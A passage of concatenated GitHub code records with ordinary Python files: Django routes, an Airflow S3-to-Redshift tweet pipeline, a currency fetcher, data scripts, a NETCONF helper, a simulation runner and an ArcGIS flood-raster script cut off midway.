)","repo_name":"vladimirmyshkovski/VoiceBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29819466946","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = 'django_twitter_search'\nurlpatterns = [\n url(r'^$', views.index, name=\"index\"),\n url(r'^search/$', views.search, name=\"search\"),\n url(r'^save/$', views.save, name='save'),\n url(r'^archive/$', views.archive, name='archive'),\n url(r'^delete/(?P\\d+)/$', views.delete, name='delete'),\n]\n","repo_name":"richardgiddings/django_twitter","sub_path":"django_twitter_search/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29404677018","text":"from airflow import DAG\nfrom datetime import datetime, timedelta\nfrom airflow.providers.postgres.operators.postgres import PostgresOperator\nfrom airflow.providers.postgres.hooks.postgres import PostgresHook\n\nfrom airflow.providers.amazon.aws.hooks.base_aws import AwsBaseHook\nfrom airflow.operators.python import PythonOperator\n\nfrom sql.sql_statements import sql_statements\nsql = sql_statements()\n\n\ndef insert_from_S3_to_redshift(*args,**kwargs):\n aws_kook = AwsBaseHook('aws_credentials',client_type='redshift')\n credentials = aws_kook.get_credentials()\n redshift_hook = PostgresHook(\"redshift\")\n execution_date = kwargs['execution_date']\n sql_stmt = sql.INSERT_INTO_STAGING_TWEETS_TABLE.format(\n staging_table='staging_tweets',\n s3_bucket='s3://twitter-data-stream/{year}/{month}/{day}/{hour}'.format(\n year=execution_date.year,\n month=str(execution_date.month).zfill(2),\n day=str(execution_date.day).zfill(2),\n hour=str(execution_date.hour).zfill(2)\n ),\n access_key_id=credentials.access_key,\n secret_access_key=credentials.secret_key,\n region='ap-northeast-1',\n json_path='s3://twitter-data-stream-support-files/main_staging_tweets.json'\n )\n redshift_hook.run(sql_stmt)\n\ndef insert_into_table(*args,**kwargs):\n redshift_hook = PostgresHook(\"redshift\")\n execution_date = kwargs['execution_date']\n sql_stmt = kwargs['sql'].format(\n year=execution_date.year,\n month=execution_date.month,\n day=execution_date.day,\n hour=execution_date.hour\n )\n redshift_hook.run(sql_stmt)\n\n\ndag = DAG(\n \"tweet_pipeline\",\n start_date=datetime(2021, 8, 16, 8, 0, 0, 0),\n schedule_interval='@hourly',\n)\n\ncreate_staging_tweets_table = PostgresOperator(\n task_id=\"create_staging_tweets_table\",\n dag=dag,\n sql=sql.CREATE_STAGING_TWEETS_TABLE,\n postgres_conn_id=\"redshift\"\n)\n\nstage_tweets_to_redshift = PythonOperator(\n task_id='stage_tweets',\n dag=dag,\n python_callable=insert_from_S3_to_redshift,\n provide_context=True\n)\n\ncreate_users_table = PostgresOperator(\n task_id=\"create_users_table\",\n dag=dag,\n sql=sql.CREATE_USERS_TABLE,\n postgres_conn_id=\"redshift\"\n)\n\ncreate_hashtags_table = PostgresOperator(\n task_id=\"create_hashtags_table\",\n dag=dag,\n sql=sql.CREATE_HASHTAGS_TABLE,\n postgres_conn_id=\"redshift\"\n)\n\ncreate_tweets_table = PostgresOperator(\n task_id=\"create_tweets_table\",\n dag=dag,\n sql=sql.CREATE_TWEETS_TABLE,\n postgres_conn_id=\"redshift\"\n)\n\n\ninsert_into_users_table = PythonOperator(\n task_id='insert_into_users_table',\n dag=dag,\n python_callable=insert_into_table,\n op_kwargs={'sql':sql.INSERT_INTO_USERS_TABLE},\n provide_context=True\n)\n\ninsert_into_hasgtags_table = PythonOperator(\n task_id='insert_into_hashtags_table',\n dag=dag,\n python_callable=insert_into_table,\n op_kwargs={'sql':sql.INSERT_INTO_HASHTAGS_TABLE},\n provide_context=True\n)\n\ninsert_into_tweets_table = PythonOperator(\n task_id='insert_into_tweets_table',\n dag=dag,\n python_callable=insert_into_table,\n op_kwargs={'sql':sql.INSERT_INTO_TWEETS_TABLE},\n provide_context=True\n)\n\n\ncreate_staging_tweets_table >> stage_tweets_to_redshift\nstage_tweets_to_redshift >> [create_users_table,create_hashtags_table,create_tweets_table]\ncreate_users_table >> insert_into_users_table\ncreate_hashtags_table >> insert_into_hasgtags_table\ncreate_tweets_table >> insert_into_tweets_table","repo_name":"nelsongcg/political_monitoring","sub_path":"etl/tweets_dag.py","file_name":"tweets_dag.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9491866016","text":"from dollar.models import DollarClp\nfrom datetime import datetime, timedelta\nimport pytz\nimport requests\nimport json\n\n\nBASE_URL_INDICADOR = \"https://mindicador.cl/api/dolar/\"\n\n\ndef make_date_range(init_date: str, end_date: str) -> list:\n \"\"\"Generates a list of dates in the format dd-mm-YYYY\n with input of dates YYYYmmdd\"\"\"\n obj_init = datetime.strptime(init_date, \"%Y%m%d\")\n obj_end = datetime.strptime(end_date, \"%Y%m%d\")\n days_difference = (obj_end - obj_init).days + 1 # inclusive el ultimo dia\n list_of_dates = list()\n for i in range(days_difference):\n date_new = obj_init + timedelta(days=i)\n list_of_dates.append(date_new.strftime(\"%d-%m-%Y\"))\n return list_of_dates\n\n\ndef make_urls(list_dates: list) -> list:\n \"\"\"Generate dollar query url by date\"\"\"\n new_list = list()\n for date_value in list_dates:\n new_list.append(BASE_URL_INDICADOR + date_value)\n return new_list\n\n\ndef parse_dollar_request(content_request: str) -> list:\n \"\"\"format the content of the request\"\"\"\n content_json = json.loads(content_request)\n if content_json[\"unidad_medida\"] == \"Pesos\" and content_json[\"codigo\"] == \"dolar\":\n return content_json[\"serie\"]\n\n\ndef make_response(list_urls: list) -> list:\n \"\"\"make a list of results based on url responses\"\"\"\n list_response = list()\n for url in list_urls:\n response = requests.get(url)\n list_response.append(parse_dollar_request(response.content))\n return list_response\n\n\ndef insert_dollar(list_data: list):\n \"\"\"Insert the elements in BD\"\"\"\n for data_dolar in list_data:\n if len(data_dolar) == 1:\n yesterday = datetime.strptime(data_dolar[0][\"fecha\"], '%Y-%m-%dT%H:%M:%S.%fZ') - timedelta(days=1)\n last_dollar = DollarClp.objects.filter(date=yesterday) # yesterday filter\n if len(last_dollar) >= 1:\n last_dollar = last_dollar.last()\n diff = data_dolar[0][\"valor\"] - last_dollar.price\n else:\n diff = 0\n new_dollar = DollarClp()\n new_dollar.price = data_dolar[0][\"valor\"]\n new_dollar.price_difference = diff\n new_dollar.date = datetime.strptime(data_dolar[0][\"fecha\"], '%Y-%m-%dT%H:%M:%S.%fZ')\n new_dollar.date_update = datetime.now(pytz.timezone('Chile/Continental'))\n new_dollar.business_day = True\n new_dollar.save()\n elif len(data_dolar) == 0:\n last_dollar = DollarClp.objects.all().order_by('date')\n if len(last_dollar) >= 1:\n last_dollar = last_dollar.last()\n yest_price = last_dollar.price\n yest_date = last_dollar.date\n else:\n continue # in this case there is not enough data to store a record\n new_dollar = DollarClp()\n new_dollar.price = yest_price\n new_dollar.price_difference = 0\n new_dollar.date = yest_date + timedelta(days=1)\n new_dollar.date_update = datetime.now(pytz.timezone('Chile/Continental'))\n new_dollar.business_day = False\n new_dollar.save()\n else:\n raise Exception(\"Cantidad de elementos no esperada\")","repo_name":"zkto/dollarBackend","sub_path":"backend/dollar/management/commands/_private.py","file_name":"_private.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"6660414980","text":"# Data Engineer Code Challenge - Levee\n\n# Importing libraries\nimport pandas as pd\nfrom datetime import datetime\n\n# Loading data from txt files into python dataframes\njobs_df = pd.read_csv(\"jobs.txt\", delimiter=\"|\")\ncategory_df = pd.read_csv(\"category.txt\", delimiter=\"|\")\n\n# Joining python dataframes into one\njoined_df = jobs_df.join(category_df.set_index(\"id\"), on=\"categoryId\")\n\n# Solution 1 - The number of Open Positions per Category Name\nsum_joined_df = joined_df.groupby([\"name\"]).sum()\nopen_positions_df = sum_joined_df[\"openPositionAmnt\"]\nprint(\"The number of Open Positions per Category Name: \\n\")\nprint(open_positions_df)\nprint(\"\\n\")\n\n# Solution 2 - The last three Jobs that have expired\ndate = datetime.today()\n\njoined_df[\"ExpiresAt\"] = pd.to_datetime(joined_df[\"ExpiresAt\"])\nexpired_positions_df = (\n joined_df.loc[joined_df[\"ExpiresAt\"] < date].sort_values(\"ExpiresAt\").iloc[-3:]\n)\nprint(\"The last three Jobs that have expired: \\n\")\nprint(expired_positions_df)\n","repo_name":"nobregacarol/levee","sub_path":"txt_get_results.py","file_name":"txt_get_results.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"31758787551","text":"data = {\n 'user_id':0,\n 'channel_id': 0,\n 'message_id' : 0,\n 'user_list': {},\n 'channel_list': {},\n 'channel_id_list': [],\n 'session_id': 0,\n 'dm_id_list': [],\n \"dm_id\": 0,\n \"dm_list\": {},\n \"reset_codes\": {},\n\n}","repo_name":"orangemukduk/unsw-dreams","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10735286236","text":"import gdspy\nimport numpy as np\n\nfrom .utils import *\n\ndef wf_stitch(geometry, wf_size, overlap = 5, extent = 10e3):\n \"\"\" create the write field stitching layer for input geometry\n\n Args:\n geometry: gdspy object to define writefield stitches for. the\n position of this object should be consistent with\n the desired coordinate system\n wf_size: write field size in the same units as geometry\n overlap: the width of the stitch in the same units as geometry\n extent: defines the square of size 2*extent x 2*extent. the\n geometry must be entirely contained within this square\n for the intersection to work correctly\n \"\"\"\n h_intersect = []\n v_intersect = []\n for x in np.arange(-extent, extent, wf_size):\n horz = gdspy.Rectangle((-extent, x - overlap/2), (extent, x + overlap/2))\n vert = gdspy.Rectangle((x - overlap/2, -extent), (x + overlap/2, extent))\n h_intersect.append(gdspy.boolean(geometry, horz, 'and'))\n v_intersect.append(gdspy.boolean(geometry, vert, 'and'))\n\n stitches = []\n\n notnone = lambda x : x is not None\n\n for polygons in filter(notnone, h_intersect):\n for p in polygons.polygons:\n stitches.append(gdspy.Polygon(p).scale(0.9, 1.0, np.mean(p, axis = 0)))\n\n for polygons in filter(notnone, v_intersect):\n for p in polygons.polygons:\n stitches.append(gdspy.Polygon(p).scale(1.0, 0.9, np.mean(p, axis = 0)))\n\n return union(stitches)\n","repo_name":"Emigon/gdspy-addons","sub_path":"gdspy_addons/stitch.py","file_name":"stitch.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"40576214816","text":"def findSharedItems(first: set, second: set, third: set) -> str:\n for letter in first:\n if letter in second and letter in third:\n return letter\n\ntotalPriority = 0\n\nwith open('input.txt', 'r') as f:\n text = f.read()\n lines = text.split('\\n')\nfor i in range(0, len(lines), 3):\n first = set(lines[i])\n second = set(lines[i + 1])\n third = set(lines[i + 2])\n common = findSharedItems(first, second, third)\n if common.isupper():\n totalPriority += ord(common) - ord('A') + 27\n else:\n totalPriority += ord(common) - ord('a') + 1\n \n\nprint(totalPriority)","repo_name":"marinisaac1/advent2022","sub_path":"3/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"11929422964","text":"import collections\r\n\r\nfrom src.helpers.connection_handler import is_netconf_socket_open\r\nfrom src.helpers.constants import connection_parameters, clean_connection_parameters, methods, filter_xml_files\r\nfrom src.helpers.parameter_handler import is_a_parameter_none\r\nfrom src.helpers.terminal_handler import get_error_string, get_bold_string, get_info_string\r\n\r\n\r\ndef get_connection():\r\n parameters = connection_parameters.copy()\r\n print(\"\\nThe default connection setup uses the PE switch \" + get_bold_string(parameters[\"host\"]) + \".\")\r\n choice = input(\"Would you like to setup your own connection: [N/y]\\t\") or \"N\"\r\n if choice == \"y\" or not is_netconf_socket_open(parameters.get(\"host\"), parameters.get(\"port\")):\r\n\r\n parameters = clean_connection_parameters.copy()\r\n\r\n while is_a_parameter_none(parameters):\r\n parameters[\"host\"] = input(\"Please enter the \" + get_info_string(\"host\") + \":\\t\") or None\r\n parameters[\"port\"] = input(\"Please enter the \" + get_info_string(\"port\") + \":\\t\") or None\r\n parameters[\"username\"] = input(\"Please enter the \" + get_info_string(\"username\") + \":\\t\") or None\r\n parameters[\"password\"] = input(\"Please enter the \" + get_info_string(\"password\") + \":\\t\") or None\r\n\r\n if not is_netconf_socket_open(parameters.get(\"host\"), parameters.get(\"port\")):\r\n parameters = clean_connection_parameters.copy()\r\n\r\n return parameters\r\n\r\n\r\ndef display_methods():\r\n for key in methods:\r\n print(\"- \" + key)\r\n return input(\"What would you like to do?: \\t\") or None\r\n\r\n\r\ndef get_filter():\r\n filter_xml = select_from_dict(filter_xml_files, \" filter\", \"\")\r\n\r\n Map = collections.namedtuple('Map', ['key', 'value'])\r\n key = filter_xml.key\r\n value = None\r\n\r\n if filter_xml.key != \"exit\":\r\n with open(\"./files/\" + filter_xml.value) as xml_file:\r\n value = xml_file.read()\r\n\r\n return Map(key, value)\r\n\r\n\r\ndef select_from_dict(selected_dict, selection_type, default=\"\"):\r\n print(\"\\n\")\r\n value = None\r\n key = None\r\n while value is None:\r\n try:\r\n for key in selected_dict.keys():\r\n print(\"- \" + key)\r\n key = input(\"Please select a\" + selection_type + \" from the list above: [\" + default + \"]\\t\") or default\r\n value = selected_dict[key]\r\n except KeyError:\r\n print(\"\\n\" + get_error_string(\"Please try again with these keys:\"))\r\n value = None\r\n\r\n Map = collections.namedtuple('Map', ['key', 'value'])\r\n return Map(key, value)\r\n","repo_name":"anjo-hsr/CloudInf","sub_path":"14-PYang/src/helpers/input_handler.py","file_name":"input_handler.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"2298940444","text":"import multiprocessing as mlt\nimport tqdm\nimport os\nimport numpy as np\n\nimport simulation.model as model\n\nimport simulation.backup as backup\nimport simulation.parameters as parameters\n\n\ndef get_heuristics():\n return model.get_heuristics()\n\n\ndef run(param):\n m = model.Model(param)\n return m.run()\n\n\ndef modify_t_max(params, t_max):\n params['t_max'] = t_max\n return params\n\n\ndef produce_data(parameters_file, data_file, t_max, random, force_params):\n \"\"\"\n Produce data for 'pooled' condition using multiprocessing\n :param parameters_file: Path to parameters file (string)\n :param data_file: Path to the future data files (dictionary with two entries)\n :return: a 'pool backup' (arbitrary Python object)\n \"\"\"\n\n json_parameters = parameters.load(parameters_file, random=random, force_params=force_params)\n\n if t_max != json_parameters['t_max']:\n json_parameters = modify_t_max(params=json_parameters, t_max=t_max)\n\n pool_parameters = parameters.extract_parameters(json_parameters)\n\n pl = mlt.Pool()\n\n backups = []\n\n for bkp in tqdm.tqdm(\n pl.imap(run, pool_parameters),\n total=len(pool_parameters)):\n backups.append(bkp)\n\n pool_backup = backup.PoolBackup(parameters=json_parameters, backups=backups)\n pool_backup.save(parameters_file, data_file)\n\n return pool_backup\n\n\ndef data_already_produced(*args):\n \"\"\"\n If data files already exist, return True\n :param args: Path to data files\n :return: True or False\n \"\"\"\n return np.all([os.path.exists(i) for i in args])\n\n\ndef pool(force, t_max, random, force_params):\n\n heuristics = model.get_heuristics()\n\n backups = {}\n\n for h in heuristics:\n\n parameters_file = \"simulation/config/pool_{}{}.json\".format(\n h, ('', '_random')[random],\n )\n\n data_file = \"simulation/results/pool_{}{}.p\".format(\n h, ('', '_random')[random],\n )\n\n if not data_already_produced(data_file) or force:\n pool_backup = produce_data(parameters_file, data_file,\n t_max=t_max, random=random, force_params=force_params)\n\n else:\n pool_backup = backup.PoolBackup.load(data_file)\n\n backups[h] = pool_backup\n\n return backups\n\n\ndef batch(force, t_max, random, force_params):\n heuristics = model.get_heuristics()\n\n backups = {}\n\n for h in heuristics:\n\n parameters_file = \"simulation/config/batch_{}{}.json\".format(\n h, ('', '_random')[random]\n )\n\n data_file = \"simulation/results/batch_{}{}.p\".format(\n h, ('', '_random')[random]\n )\n\n if not data_already_produced(data_file) or force:\n batch_backup = produce_data(parameters_file, data_file,\n t_max=t_max, random=random, force_params=force_params)\n\n else:\n batch_backup = backup.PoolBackup.load(data_file)\n\n backups[h] = batch_backup\n\n return backups\n\n\ndef individual(force=False, force_params=False):\n heuristics = model.get_heuristics()\n\n backups = {i: dict() for i in heuristics}\n\n for h in heuristics:\n\n for r in (\"25\", \"50\"):\n\n parameters_file = \"simulation/config/{}_{}.json\".format(r, h)\n data_file = \"simulation/results/{}_{}.p\".format(r, h)\n\n if not data_already_produced(parameters_file, data_file) or force:\n\n json_parameters = parameters.load(parameters_file, force_params, random=False)\n param = parameters.extract_parameters(json_parameters)\n run_backup = run(param)\n run_backup.save(parameters_file, data_file)\n\n else:\n run_backup = backup.RunBackup.load(data_file)\n\n backups[h][r] = run_backup\n\n return backups\n","repo_name":"AurelienNioche/DuopolyAnalysis","sub_path":"simulation/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"23562241814","text":"import arcpy\nimport time\nimport os\nimport re\n\nimport sys\nimport common_lib\nfrom common_lib import create_msg_body, msg, trace\nfrom settings import *\n\n# error classes\nclass NotProjected(Exception):\n pass\n\n\nclass NoNoDataError(Exception):\n pass\n\n\nclass LicenseError3D(Exception):\n pass\n\n\nclass LicenseErrorSpatial(Exception):\n pass\n\n\nclass NoUnits(Exception):\n pass\n\n\nclass NoInputLayer(Exception):\n pass\n\n\nclass NoDepthRaster(Exception):\n pass\n\n\nclass NoPolygons(Exception):\n pass\n\n\nclass SchemaLock(Exception):\n pass\n\n\nclass NotSupported(Exception):\n pass\n\n\nclass NoLayerFile(Exception):\n pass\n\n\nclass FunctionError(Exception):\n pass\n\n\nclass MixOfSR(Exception):\n pass\n\nWARNING = \"warning\"\n\n# used functions\n\ndef create_raster(input_source, depth_raster, depth_value, boundary_size, boundary_offset, output_raster, debug):\n try:\n # Get Attributes from User\n if debug == 0:\n # script variables\n aprx = arcpy.mp.ArcGISProject(\"CURRENT\")\n home_directory = aprx.homeFolder\n tiff_directory = home_directory + \"\\\\Tiffs\"\n tin_directory = home_directory + \"\\\\Tins\"\n scripts_directory = aprx.homeFolder + \"\\\\Scripts\"\n rule_directory = aprx.homeFolder + \"\\\\rule_packages\"\n log_directory = aprx.homeFolder + \"\\\\Logs\"\n layer_directory = home_directory + \"\\\\layer_files\"\n project_ws = aprx.defaultGeodatabase\n\n enableLogging = True\n DeleteIntermediateData = True\n verbose = 0\n in_memory_switch = True\n else:\n # debug\n home_directory = r'D:\\Temporary\\Flood\\3DFloodImpact'\n tiff_directory = home_directory + \"\\\\Tiffs\"\n log_directory = home_directory + \"\\\\Logs\"\n layer_directory = home_directory + \"\\\\LayerFiles\"\n project_ws = home_directory + \"\\\\Testing.gdb\"\n\n enableLogging = False\n DeleteIntermediateData = True\n verbose = 1\n in_memory_switch = False\n\n scratch_ws = common_lib.create_gdb(home_directory, \"Intermediate.gdb\")\n arcpy.env.workspace = scratch_ws\n arcpy.env.overwriteOutput = True\n\n # fail safe for Eurpose's comma's\n depth_value = float(re.sub(\"[,.]\", \".\", depth_value))\n boundary_size = float(re.sub(\"[,.]\", \".\", boundary_size))\n boundary_offset = float(re.sub(\"[,.]\", \".\", boundary_offset))\n\n bail = 0\n\n if debug == 1:\n use_in_memory = False\n else:\n use_in_memory = True\n\n common_lib.set_up_logging(log_directory, TOOLNAME)\n start_time = time.clock()\n\n if arcpy.CheckExtension(\"3D\") == \"Available\":\n arcpy.CheckOutExtension(\"3D\")\n\n if arcpy.CheckExtension(\"Spatial\") == \"Available\":\n arcpy.CheckOutExtension(\"Spatial\")\n\n # check if input exists\n if arcpy.Exists(input_source):\n arcpy.AddMessage(\"Processing input source: \" + common_lib.get_name_from_feature_class(input_source))\n\n no_initial_depth_raster = False\n\n # create isnull from input source\n if use_in_memory:\n is_null = \"in_memory/isnull_copy\"\n else:\n is_null = os.path.join(scratch_ws, \"isnull_copy\")\n\n if arcpy.Exists(is_null):\n arcpy.Delete_management(is_null)\n\n\n # check where we have NULL values\n is_Null_raster = arcpy.sa.IsNull(input_source)\n is_Null_raster.save(is_null)\n\n # if we have a depth raster as input: make sure it overlaps with input_source\n if depth_raster:\n if arcpy.Exists(depth_raster):\n # Check if same spatial reference!!!\n if common_lib.check_same_spatial_reference([input_source], [depth_raster]) == 1:\n depth_raster = None\n raise MixOfSR\n else:\n if use_in_memory:\n clip_raster = \"in_memory/clip_copy\"\n else:\n clip_raster = os.path.join(scratch_ws, \"clip_copy\")\n\n if arcpy.Exists(clip_raster):\n arcpy.Delete_management(clip_raster)\n\n # check extents\n # clip terrain to extent\n msg_body = create_msg_body(\"Clipping depth raster to input flooding layer extent\", 0, 0)\n msg(msg_body)\n\n arcpy.Clip_management(depth_raster, \"#\", clip_raster, input_source, \"#\", \"#\", \"MAINTAIN_EXTENT\")\n\n # TODO double check below\n # create IsNull to be used to check for NoData.\n if use_in_memory:\n is_null0 = \"in_memory/is_null0\"\n else:\n is_null0 = os.path.join(scratch_ws, \"is_null0\")\n if arcpy.Exists(is_null0):\n arcpy.Delete_management(is_null0)\n\n is_null_raster = arcpy.sa.IsNull(clip_raster)\n is_null_raster.save(is_null0)\n min_value = arcpy.GetRasterProperties_management(is_null0, \"MINIMUM\")[0]\n\n# all_nodata = arcpy.GetRasterProperties_management(clip_raster, \"ALLNODATA\")[0]\n\n if int(min_value) == 1:\n msg_body = create_msg_body(\"Input rasters do not overlap.\", 0, 0)\n msg(msg_body, WARNING)\n depth_raster = None\n else:\n org_depth_raster = depth_raster\n depth_raster = clip_raster\n no_initial_depth_raster = False\n\n # if depth_value > 0:\n # # grab set all values > 2 to default depth value\n # if use_in_memory:\n # depth_push = \"in_memory/depth_push\"\n # else:\n # depth_push = os.path.join(scratch_ws, \"depth_push\")\n #\n # if arcpy.Exists(depth_push):\n # arcpy.Delete_management(depth_push)\n #\n # msg_body = create_msg_body(\"Pushing depth > 2 to: \" + str(depth_value), 0, 0)\n # msg(msg_body)\n #\n # depth_pushRaster = arcpy.sa.Con(clip_raster, depth_value, clip_raster, \"VALUE > 2\")\n # depth_pushRaster.save(depth_push)\n #\n # depth_raster = depth_push\n # else:\n # depth_raster = clip_raster\n else:\n depth_raster = None\n raise NoDepthRaster\n\n # if we don't have a depth raster: crate one based on the depth value\n if not depth_raster:\n if depth_value != 0:\n no_initial_depth_raster = True\n\n arcpy.AddMessage(\"Using default depth value of: \" + str(depth_value))\n\n # create raster from default depth value\n if use_in_memory:\n depth_raster = \"in_memory/depth_value_raster\"\n else:\n depth_raster = os.path.join(scratch_ws, \"depth_value_raster\")\n\n if arcpy.Exists(depth_raster):\n arcpy.Delete_management(depth_raster)\n\n # create raster from default depth value\n msg_body = create_msg_body(\"Create depth raster from default depth value.\", 0, 0)\n msg(msg_body)\n\n outConRaster = arcpy.sa.Con(is_null, depth_value, depth_value)\n outConRaster.save(depth_raster)\n else:\n bail = 1\n msg_body = create_msg_body(\"No depth raster and default depth value is 0. No point continuing.\", 0, 0)\n msg(msg_body, WARNING)\n\n if bail == 0:\n # subtract depth raster from flood elevation raster\n cell_size_source = arcpy.GetRasterProperties_management(input_source, \"CELLSIZEX\")\n cell_size_depth = arcpy.GetRasterProperties_management(depth_raster, \"CELLSIZEX\")\n\n if cell_size_source.getOutput(0) == cell_size_depth.getOutput(0):\n if arcpy.Exists(output_raster):\n arcpy.Delete_management(output_raster)\n\n # create raster from depth values\n # adjust values that are less than 0.2\n if use_in_memory:\n depth_push = \"in_memory/depth_boundary_push\"\n depth_temp = \"in_memory/depth_temp\"\n else:\n depth_push = os.path.join(scratch_ws, \"depth_boundary_push\")\n\n if arcpy.Exists(depth_push):\n arcpy.Delete_management(depth_push)\n\n depth_temp = os.path.join(scratch_ws, \"depth_temp\")\n\n if arcpy.Exists(depth_temp):\n arcpy.Delete_management(depth_temp)\n\n msg_body = create_msg_body(\"Adjusting boundary values by: \" + str(boundary_offset), 0, 0)\n msg(msg_body)\n\n # add boundary offset to depth raster\n arcpy.Plus_3d(depth_raster, boundary_offset, depth_temp)\n\n depth_raster_object = arcpy.sa.Raster(depth_raster)\n\n # for values less than 0.2 -> grab adjusted depth raster.\n depth_push_Boundary_Raster = arcpy.sa.Con(depth_raster_object < 0.2, depth_temp, depth_raster)\n depth_push_Boundary_Raster.save(depth_push)\n\n depth_raster = depth_push\n\n if use_in_memory:\n clip_depth = \"in_memory/clip_depth\"\n else:\n clip_depth = os.path.join(scratch_ws, \"clip_depth\")\n\n if arcpy.Exists(clip_depth):\n arcpy.Delete_management(clip_depth)\n\n # create raster from default depth value\n msg_body = create_msg_body(\"Create clip depth raster...\", 0, 0)\n msg(msg_body)\n\n # grab depth elevation values where not null and null where is null (clip using flooding raster)\n outConRaster = arcpy.sa.Con(is_null, input_source, depth_raster)\n outConRaster.save(clip_depth)\n\n msg_body = create_msg_body(\"Subtracting depth raster from input flooding raster.\", 0, 0)\n msg(msg_body)\n\n if use_in_memory:\n minus_raster = \"in_memory/minus_3D\"\n else:\n minus_raster = os.path.join(scratch_ws, \"minus_3D\")\n if arcpy.Exists(minus_raster):\n arcpy.Delete_management(minus_raster)\n\n # actual subtract\n arcpy.Minus_3d(input_source, clip_depth, minus_raster)\n\n # now we want just the outside cells (1x cellsize)\n if use_in_memory:\n raster_polygons = \"in_memory/raster_polygons\"\n else:\n raster_polygons = os.path.join(scratch_ws, \"raster_polygons\")\n if arcpy.Exists(raster_polygons):\n arcpy.Delete_management(raster_polygons)\n\n out_geom = \"POLYGON\" # output geometry type\n arcpy.RasterDomain_3d(minus_raster, raster_polygons, out_geom)\n\n # buffer it outwards first\n if use_in_memory:\n polygons_outward = \"in_memory/outward_buffer\"\n else:\n polygons_outward = os.path.join(scratch_ws, \"outward_buffer\")\n if arcpy.Exists(polygons_outward):\n arcpy.Delete_management(polygons_outward)\n\n # x = cell_size_source.getOutput(0)\n x = float(re.sub(\"[,.]\", \".\", str(cell_size_source.getOutput(0))))\n# x = float(str(cell_size_source.getOutput(0)))\n buffer_out = int(x)\n\n xy_unit = common_lib.get_xy_unit(minus_raster, 0)\n\n if xy_unit == \"Feet\":\n buffer_text = str(buffer_out) + \" Feet\"\n else:\n buffer_text = str(buffer_out) + \" Meters\"\n\n sideType = \"FULL\"\n arcpy.Buffer_analysis(raster_polygons, polygons_outward, buffer_text, sideType)\n\n # buffer it inwards so that we have a polygon only of the perimeter plus a 2 cells inward.\n if use_in_memory:\n polygons_inward = \"in_memory/inward_buffer\"\n else:\n polygons_inward = os.path.join(scratch_ws, \"inward_buffer\")\n if arcpy.Exists(polygons_inward):\n arcpy.Delete_management(polygons_inward)\n\n # x = cell_size_source.getOutput(0)\n x = float(re.sub(\"[,.]\", \".\", str(cell_size_source.getOutput(0))))\n# x = float(str(cell_size_source.getOutput(0)))\n\n buffer_in = (boundary_size-1) + int(2*x) # boundary is always 2 cellsizes / user can't go lower than 2.\n\n xy_unit = common_lib.get_xy_unit(minus_raster, 0)\n\n if xy_unit == \"Feet\":\n buffer_text = \"-\" + str(buffer_in) + \" Feet\"\n else:\n buffer_text = \"-\" + str(buffer_in) + \" Meters\"\n\n sideType = \"FULL\"\n arcpy.Buffer_analysis(polygons_outward, polygons_inward, buffer_text, sideType)\n\n if use_in_memory:\n erase_polygons = \"in_memory/erase\"\n else:\n erase_polygons = os.path.join(scratch_ws, \"erase\")\n if arcpy.Exists(erase_polygons):\n arcpy.Delete_management(erase_polygons)\n\n xyTol = \"1 Meters\"\n arcpy.Erase_analysis(polygons_outward, polygons_inward, erase_polygons)\n\n msg_body = create_msg_body(\"Buffering depth edges...\", 0, 0)\n msg(msg_body)\n\n if use_in_memory:\n extract_mask_raster = \"in_memory/extract_mask\"\n else:\n extract_mask_raster = os.path.join(scratch_ws, \"extract_mask\")\n if arcpy.Exists(extract_mask_raster):\n arcpy.Delete_management(extract_mask_raster)\n\n extract_temp_raster = arcpy.sa.ExtractByMask(minus_raster, erase_polygons)\n extract_temp_raster.save(extract_mask_raster)\n\n if no_initial_depth_raster == True:\n if use_in_memory:\n plus_mask = \"in_memory/plus_mask\"\n else:\n plus_mask = os.path.join(scratch_ws, \"plus_mask\")\n if arcpy.Exists(plus_mask):\n arcpy.Delete_management(plus_mask)\n\n arcpy.Plus_3d(extract_mask_raster, (depth_value - 1), plus_mask)\n extract_mask_raster = plus_mask\n\n if use_in_memory:\n minus_raster2 = \"in_memory/minus_3D2\"\n else:\n minus_raster2 = os.path.join(scratch_ws, \"minus_3D2\")\n if arcpy.Exists(minus_raster2):\n arcpy.Delete_management(minus_raster2)\n\n # push depth elevation raster down by default depth value\n if depth_value > 0 and no_initial_depth_raster == False:\n msg_body = create_msg_body(\"Pushing inner depth down by: \" + str(depth_value) + \" to prevent z-fighting.\", 0, 0)\n msg(msg_body)\n arcpy.Minus_3d(minus_raster, depth_value, minus_raster2)\n else:\n minus_raster2 = minus_raster\n\n if 0: #use_in_memory:\n mosaic_raster = \"in_memory/mosaic\"\n else:\n mosaic_raster = os.path.join(scratch_ws, \"mosaic\")\n if arcpy.Exists(mosaic_raster):\n arcpy.Delete_management(mosaic_raster)\n\n listRasters = []\n listRasters.append(extract_mask_raster)\n listRasters.append(minus_raster2)\n\n desc = arcpy.Describe(listRasters[0])\n\n # grab the original outside cells and the pushed down depth elevation raster\n 